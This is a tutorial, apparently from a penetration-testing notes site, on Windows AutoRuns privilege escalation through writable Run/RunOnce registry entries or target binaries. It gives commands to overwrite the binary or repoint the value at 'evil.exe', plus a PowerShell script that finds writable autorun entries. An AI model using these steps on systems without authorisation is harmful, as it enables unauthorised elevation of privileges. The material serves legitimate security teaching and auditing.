# AutoRuns

### Overview

**AutoRuns privilege escalation** occurs when a **low-privileged user** can influence a **startup registry entry** (an entry under the `Run` / `RunOnce` keys) that causes an executable or script to run automatically **when a privileged user logs on or when the system boots**.

If such an entry points to an **executable the low-privileged user can write**, or the **registry value itself is writable**, the attacker can replace the referenced program (or repoint the value at their own binary) and have their code run in the privileged user's context, gaining **elevated execution**.

### Why This Works

Windows automatically executes programs defined in specific registry keys during:

* User logon
* System startup

If either:

* The registry key (or value) is writable by the low-privileged user, or
* The referenced executable (or the directory it lives in, when the binary is missing) is writable

then arbitrary code runs in the **security context of the user who logs on**. `HKLM\...\Run` entries fire for every interactive logon, so an administrator's logon gives administrator-level execution; `HKCU\...\Run` entries fire only for that one user.

Caveat: with UAC in its default configuration, a Run entry launched at an administrator's logon runs with that user's filtered (medium-integrity) token, so a UAC bypass may still be needed to get a fully elevated process. If UAC is disabled, or the account is the built-in `Administrator` (exempt from admin approval mode by default), the code runs fully elevated.

### Prerequisites

1. Local low-privileged access
2. A high-privilege execution trigger (an administrator logs on, or the system reboots)
3. At least one of:
   * A writable AutoRun registry key or value (write or full control for the low-privileged user), or
   * A writable executable path referenced by the entry

### Steps

1. Confirm the registry entries

   ```bash
   # Machine wide (runs for every user who logs on)
   reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   # User specific (runs only for the current user)
   reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
   ```
2. Check the file path permissions and the registry key permissions (run `accesschk` as the low-privileged user; `-w` lists only objects that user can write, `-k` treats the argument as a registry key)

   ```bash
   # Check path permissions on the binary the entry points at
   accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
   # Check registry key permissions
   accesschk.exe /accepteula -uwkv HKLM\Software\Microsoft\Windows\CurrentVersion\Run
   ```
3. Replace the executable (if the file is writable) or repoint the value (if the key is writable)

   ```bash
   # Overwrite the referenced binary (requires write access to the file)
   copy /Y startup.exe "C:\Program Files\VulnApp\startup.exe"
   # Repoint the registry value at your own binary (requires write access to the key)
   reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v VulnApp /d "C:\Temp\evil.exe" /f
   ```
4. Trigger execution: wait for an administrator to log on (console or a new RDP session), or for the system to reboot and an administrator to log on afterwards
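As an added example that is not part of the original page, the PowerShell script below automates steps 1 and 2: it walks the standard `Run` / `RunOnce` keys under `HKLM` and `HKCU`, extracts the executable each value points at, and flags entries whose key, target binary, or target directory the current user can write. It goes slightly beyond the text by also checking `RunOnce` and the WOW6432Node key, and by reporting a writable directory when the target binary is missing. Run it as the low-privileged user you are assessing; the function names and the ACL-matching logic are mine, not Windows or Sysinternals APIs, and the check compares the current token's SIDs against each ACE rather than calling `AccessCheck`, so treat a "writable" result as a lead to confirm with `accesschk` or `icacls`.

```powershell
# Added example (not from the original page). Run as the low-privileged user.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

# SIDs carried by the current token (user + every group), as strings.
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

# Rights that let us repoint the entry (registry) or replace the binary (file).
# GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) appear in some file ACEs.
$keyWrite  = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, FullControl'
$fileWrite = ([int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Write, Modify, FullControl') -bor 0x40000000 -bor 0x10000000

function Test-AllowsWrite {
    # $Acl is a FileSecurity or RegistrySecurity; $RightsProp names its rights property.
    param($Acl, [int]$Wanted, [string]$RightsProp)
    $allowed = $false
    foreach ($ace in $Acl.Access) {
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                      # orphaned / unresolvable account
        if ($mySids -notcontains $sid) { continue }
        if (([int]($ace.$RightsProp) -band $Wanted) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }   # matching Deny wins
        $allowed = $true
    }
    return $allowed
}

function Resolve-AutorunTarget {
    # Extract the program path from value data: quoted path, unquoted path with
    # spaces, or a bare command. %ENV% references are expanded first.
    param([string]$Data)
    $d = [Environment]::ExpandEnvironmentVariables($Data.Trim())
    if ($d -match '^"([^"]+)"') { return $Matches[1] }
    if ($d -match '^(.+?\.(exe|cmd|bat|vbs|ps1|dll))(\s|$)') { return $Matches[1] }
    return ($d -split '\s+')[0]
}

function Get-WritableAutoruns {
    foreach ($key in $runKeys) {
        $item = Get-Item -Path $key -ErrorAction SilentlyContinue
        if (-not $item) { continue }
        $keyWritable = Test-AllowsWrite (Get-Acl -Path $key) $keyWrite 'RegistryRights'
        foreach ($name in $item.GetValueNames()) {
            $data   = [string]$item.GetValue($name, '', 'DoNotExpandEnvironmentNames')
            $target = Resolve-AutorunTarget $data
            if ([string]::IsNullOrWhiteSpace($target)) { continue }
            $exists = Test-Path -LiteralPath $target -PathType Leaf
            $fileWritable = $false; $dirWritable = $false
            if ($exists) {
                $fileWritable = Test-AllowsWrite (Get-Acl -LiteralPath $target) $fileWrite 'FileSystemRights'
            }
            $dir = Split-Path -Path $target -Parent
            if ($dir -and (Test-Path -LiteralPath $dir -PathType Container)) {
                # A writable directory matters when the binary is missing: it can be planted.
                $dirWritable = Test-AllowsWrite (Get-Acl -LiteralPath $dir) $fileWrite 'FileSystemRights'
            }
            [PSCustomObject]@{
                Key          = $key
                Name         = $name
                Target       = $target
                TargetExists = $exists
                KeyWritable  = $keyWritable
                FileWritable = $fileWritable
                DirWritable  = $dirWritable
            }
        }
    }
}

# Only show entries that give us a foothold: writable key, binary, or (missing-binary) directory.
Get-WritableAutoruns |
    Where-Object { $_.KeyWritable -or $_.FileWritable -or $_.DirWritable } |
    Format-Table -AutoSize
```

Entries launched through a host such as `rundll32.exe` or `cmd /c` are reported with the host as the target; inspect those by hand, since the writable file that matters is the DLL or script passed as an argument. The value data is read with `DoNotExpandEnvironmentNames` and expanded in the current session, so a `%ProgramFiles%` entry resolves the way it would for this user.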

